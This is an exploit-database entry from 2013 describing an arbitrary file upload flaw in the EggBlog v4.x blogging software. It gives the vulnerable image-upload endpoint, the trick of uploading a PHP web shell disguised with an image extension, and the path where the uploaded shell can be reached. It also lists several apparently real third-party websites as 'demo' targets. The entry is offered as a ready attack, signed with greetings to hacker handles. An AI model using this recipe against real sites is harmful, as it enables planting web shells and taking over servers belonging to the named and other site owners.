EggBlog v4.X.X Arbitrary File Upload vulnerability

2013-12-14T00:00:00
ID 1337DAY-ID-21665
Type zdt
Reporter TUNISIAN CYBER
Modified 2013-12-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+] Author: TUNISIAN CYBER
[+] Exploit Title:  EggBlog v4.X.X Arbitrary File Upload vulnerability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor:http://sourceforge.net/projects/eggblog/
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04
  
  
########################################################################################

Site.ltd/[PaTh]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Upload h4x3d.php.jpg/gif/png
Shell Path:
site.ltd/[PaTh]/photos/uploads/h4x3d.php.jpg

Demo:
www.thehenryvi.com/news
www.cn-blue.com
www.alrecenk.com/eggblog
sweetlyunique.net/blog
fucopuredietpills.com/eggblog/
www.mrcromwellsattic.com/blog/
elkarius.free.fr
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

#  0day.today [2018-03-01]  #